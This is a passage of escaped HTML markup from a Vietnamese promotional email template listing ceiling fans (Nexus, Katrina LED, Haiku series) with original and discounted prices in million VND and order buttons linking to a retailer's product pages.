cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_10\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>NEXUS WH\\/BL 60\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_11\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">7.9 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">6.3 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_11\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766391705-KATRINA.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_12\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_13\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>KATRINA LED 52\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_14\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">6.5 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup><span style=\\\"line-height: 12px;\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">5.2 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_12\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768098980-L-44-wh.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_15\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_16\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>HAIKU WH\\/BL 44\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_17\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">18.5 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">15.8 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_13\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-44inch-mau-trang.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-44inch-mau-trang.html\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768333052-HAIKU-I-S.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_18\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU I SERIES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_19\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>HAIKU WH\\/BL 60\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_20\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">36.9 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup><span style=\\\"line-height: 12px;\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">31.5 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_14\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cao-cap-haiku-i-60inch-mau-den.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cao-cap-haiku-i-60inch-mau-den.html\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: 